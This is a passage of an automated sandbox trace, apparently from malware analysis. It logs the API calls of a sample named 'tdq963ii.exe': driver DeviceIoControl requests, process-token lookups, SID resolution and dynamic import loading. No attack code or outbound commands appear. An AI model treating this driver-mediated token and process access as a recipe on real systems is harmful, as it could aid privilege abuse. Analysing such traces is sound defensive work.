PriorityBoost=0) [0247.749] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.750] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.750] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.750] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.750] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.750] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.750] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.750] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.750] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.750] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.750] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.750] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.750] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.750] PsLookupProcessByProcessId (in: ProcessId=0x748, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.750] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.750] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6f4) returned 0xc8 [0247.750] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.750] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80030ca820, HandleInformation=0x0) returned 0x0 [0247.750] ObOpenObjectByPointer (in: Object=0xfffffa80030ca820, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0247.750] ObfDereferenceObject (Object=0xfffffa80030ca820) returned 0x20 [0247.750] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa80030a0180 | out: TokenHandle=0xfffffa80030a0180*=0xc4) returned 0x0 [0247.750] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0247.750] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.750] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.750] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.752] CloseHandle (hObject=0xc4) returned 1 [0247.752] CloseHandle (hObject=0xc8) returned 1 [0247.752] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.752] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.752] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.752] PsAcquireProcessExitSynchronization () returned 0x0 [0247.752] KeStackAttachProcess (in: PROCESS=0xfffffa80030ca820, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030ca820, ApcState=0xfffff880053c85d0) [0247.752] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80022cd960, HandleInformation=0x0) returned 0x0 [0247.752] ObfDereferenceObject (Object=0xfffffa80022cd960) returned 0x1 [0247.752] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.752] PsReleaseProcessExitSynchronization () returned 0x2 [0247.752] ObfDereferenceObject (Object=0xfffffa80030ca820) returned 0x1e [0247.752] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.752] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.752] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.752] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.752] PsLookupProcessByProcessId (in: ProcessId=0x6f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.752] PsAcquireProcessExitSynchronization () returned 0x0 [0247.752] KeStackAttachProcess (in: PROCESS=0xfffffa80030ca820, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80030ca820, ApcState=0xfffff880053c85d0) [0247.753] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80022b0b40, HandleInformation=0x0) returned 0x0 [0247.753] ObfDereferenceObject (Object=0xfffffa80022b0b40) returned 0x1 [0247.753] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.753] PsReleaseProcessExitSynchronization () returned 0x2 [0247.753] ObfDereferenceObject (Object=0xfffffa80030ca820) returned 0x1e [0247.753] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.753] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x1000) returned 0x1f0b20 [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.753] GetLastError () returned 0x57 [0247.753] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.754] SetLastError (dwErrCode=0x57) [0247.754] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetLastError () returned 0x57 [0247.755] SetLastError (dwErrCode=0x57) [0247.755] GetVersion () returned 0x1db10106 [0247.755] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4 [0247.755] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4, lpConsoleScreenBufferInfo=0x12fec0 | out: lpConsoleScreenBufferInfo=0x12fec0) returned 0 [0247.893] WriteFile (in: hFile=0x4, lpBuffer=0x12e900*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x12e220, lpOverlapped=0x0 | out: lpBuffer=0x12e900*, lpNumberOfBytesWritten=0x12e220*=0x1d, lpOverlapped=0x0) returned 1 [0247.894] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1cffd0 | out: hHeap=0x1b0000) returned 1 [0247.894] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x12feb8 | out: phModule=0x12feb8) returned 0 [0247.894] RtlExitUserProcess (ExitCode=0x1) [0247.895] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1cf030 | out: hHeap=0x1b0000) returned 1 [0247.901] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) Thread: id = 867 os_tid = 0xa28 Process: id = "257" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x16f6c000" os_pid = "0x748" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "253" os_parent_pid = "0x264" cmd_line = "tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 866 os_tid = 0x758 [0239.079] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0239.080] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0239.080] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0239.080] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0239.080] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0239.080] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0239.080] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0239.080] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0239.081] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0239.082] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0239.083] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0239.083] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0239.083] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0239.083] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0239.083] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0239.083] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0239.083] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0239.084] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0239.085] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0239.086] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0239.087] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0239.088] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0239.089] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0239.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0239.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0239.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0239.090] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0239.090] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0239.090] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0239.090] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0239.090] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0239.090] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0239.091] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0239.092] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0239.092] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0239.092] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0239.092] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0239.092] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0239.092] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0239.092] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0239.092] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0239.093] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0239.093] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0239.093] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0239.093] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0239.093] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0239.093] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0239.093] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0239.093] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0239.093] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0239.094] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0239.094] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0239.094] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0239.094] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0239.094] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0239.094] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0239.094] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0239.094] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0239.095] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0239.096] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x446a0920, dwHighDateTime=0x1d68287)) [0239.096] GetCurrentThreadId () returned 0x758 [0239.096] GetCurrentProcessId () returned 0x748 [0239.096] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=35943468250) returned 1 [0239.096] GetProcessHeap () returned 0x650000 [0239.096] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0239.096] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0239.096] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0239.097] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0239.098] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0239.099] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0239.099] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0239.099] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0239.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0239.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0239.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0239.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0239.103] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0239.104] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 